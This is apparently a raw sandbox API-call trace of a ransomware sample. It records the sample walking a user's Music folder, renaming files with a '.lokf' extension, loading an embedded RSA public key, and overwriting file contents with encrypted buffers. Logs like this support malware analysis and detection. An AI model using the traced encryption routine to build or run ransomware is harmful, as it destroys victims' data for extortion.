[0060.781] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.781] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.781] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.781] CloseHandle (hObject=0x5cc) returned 1 [0060.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e0) returned 0x326aa18 [0060.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31e9450 | out: hHeap=0x660000) returned 1 [0060.782] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\0rf9GWEzIubnTo8mKkZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\0rf9gweziubnto8mkkz.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\0rf9GWEzIubnTo8mKkZ.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\0rf9gweziubnto8mkkz.mp3.lokf")) returned 1 [0060.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0060.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.783] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.784] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09a9a00, ftCreationTime.dwHighDateTime=0x1d4c80f, ftLastAccessTime.dwLowDateTime=0xdce01670, ftLastAccessTime.dwHighDateTime=0x1d4d088, ftLastWriteTime.dwLowDateTime=0xdce01670, ftLastWriteTime.dwHighDateTime=0x1d4d088, nFileSizeHigh=0x0, nFileSizeLow=0x4703, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5t8t.wav", cAlternateFileName="")) returned 1 [0060.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.784] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\5t8t.wav") returned=".wav" [0060.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\5t8t.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\5t8t.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.784] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=18179) returned 1 [0060.784] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.786] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x46dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.787] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.787] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.787] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x4703, lpOverlapped=0x0) returned 1 [0060.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.788] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.788] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.788] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.788] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.788] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.788] GetLastError () returned 0x0 [0060.788] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.789] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.789] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.789] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.789] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4700) returned 0x9c8bae8 [0060.789] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c899a0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85fe0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c899e8 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ff8 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86028 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86040 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.789] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.789] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86040 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86028 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.790] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.790] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.790] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.791] GetCurrentThreadId () returned 0x9e0 [0060.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b7b0 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.792] GetCurrentThreadId () returned 0x9e0 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86028 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86040 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86010 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86058 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86028 [0060.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86028 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86058 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86010 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ff8 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c899e8 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.795] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x46fe, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x46fe, lpOverlapped=0x0) returned 1 [0060.795] 